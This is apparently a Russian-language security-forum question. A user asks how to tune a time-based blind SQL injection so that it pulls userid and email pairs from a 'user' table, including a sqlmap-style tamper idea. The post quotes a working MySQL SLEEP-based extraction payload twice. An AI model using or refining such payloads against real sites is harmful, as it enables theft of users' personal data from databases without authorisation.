• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Вопрос насчет SQL

Logas

Grey Team
23.04.2023
193
85
BIT
375
Суть в чём техника time based , а мне нужно вытащить данные из таблицы user , где userid=1.Получить userid,email

Суть в чём , если я сливаю просто userid , то все окей 1,2,3 и т.д айдишники сливаются , а если userid,email ТО влияние идет на email , т.к ORDER BY email
(SELECT 8186 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(email AS NCHAR),0x20) FROM data.user ORDER BY email LIMIT 1,1),21,1))>45,0,2)))))XmMr)

Единственное , что в голову приходит - это написать tamper , чтобы ORDER BY email заменялся на ORDER BY id.И тогда сортироваться будет адекватно , то есть 1 айди и все нужные записи к нему...Как вы считаете есть ли вариант получше?

И можно ли запрос как-то изменить вот этот:
(SELECT 8186 FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(email AS NCHAR),0x20) FROM data.user ORDER BY email LIMIT 1,1),21,1))>45,0,2)))))XmMr)
чтобы вместо сравнения с символами сразу равенство было , то есть оператор like...
 

Logas

Grey Team
23.04.2023
193
85
BIT
375
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!